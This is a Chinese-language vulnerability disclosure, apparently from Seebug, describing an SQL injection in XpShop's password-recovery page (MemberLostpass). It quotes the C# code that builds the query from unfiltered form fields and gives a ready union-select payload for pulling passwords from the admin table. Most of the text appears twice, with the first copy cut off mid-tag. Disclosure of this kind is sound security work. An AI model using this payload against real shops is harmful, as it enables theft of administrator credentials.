### 简要描述: ### 详细说明: 漏洞位置:xpshop.webui.MemberLostpass ``` protected void btnSend_Click(object sender, EventArgs e) { this.btnSend.Enabled = false; if (int.Parse(Utils.GetTableValues("Member", "Count(MemberID)", "Name", this.txtAccount.Text.Trim(), " And Email = '" + this.txtEmail.Text.Trim() + "'").ToString()) == 0) ``` 跟进函数GetTableValues: ``` public static object GetTableValues(string tableName, string fieldName, string parameter, string val, string total) { string cmdText = string.Concat(new string[] { "Select ", fieldName, " From ", tableName, " Where ", parameter, " = '", val, "' ", total }); return XpShopDB.ExecuteScalar(XpShopDB.ConnectionString, CommandType.Text, cmdText, null); } ``` 没过滤进库,不过获取方式是在表单上获取的。 利用方法就是访问: http://localhost/memberlostpass.aspx 然后输入会员名或者邮箱输入:test' union select password from admin-- 这两个地方都是进库的,所以都可以注入,而且payload都是一样的,本地测试报错注入! ### 漏洞证明: [<img src="https://images.seebug.org/upload/201510/1515231470f014aefe9d42f1c06bcea6dded7e62.jpg" alt="1.jpg"...
### 简要描述: ### 详细说明: 漏洞位置:xpshop.webui.MemberLostpass ``` protected void btnSend_Click(object sender, EventArgs e) { this.btnSend.Enabled = false; if (int.Parse(Utils.GetTableValues("Member", "Count(MemberID)", "Name", this.txtAccount.Text.Trim(), " And Email = '" + this.txtEmail.Text.Trim() + "'").ToString()) == 0) ``` 跟进函数GetTableValues: ``` public static object GetTableValues(string tableName, string fieldName, string parameter, string val, string total) { string cmdText = string.Concat(new string[] { "Select ", fieldName, " From ", tableName, " Where ", parameter, " = '", val, "' ", total }); return XpShopDB.ExecuteScalar(XpShopDB.ConnectionString, CommandType.Text, cmdText, null); } ``` 没过滤进库,不过获取方式是在表单上获取的。 利用方法就是访问: http://localhost/memberlostpass.aspx 然后输入会员名或者邮箱输入:test' union select password from admin-- 这两个地方都是进库的,所以都可以注入,而且payload都是一样的,本地测试报错注入! ### 漏洞证明: [<img src="https://images.seebug.org/upload/201510/1515231470f014aefe9d42f1c06bcea6dded7e62.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/1515231470f014aefe9d42f1c06bcea6dded7e62.jpg)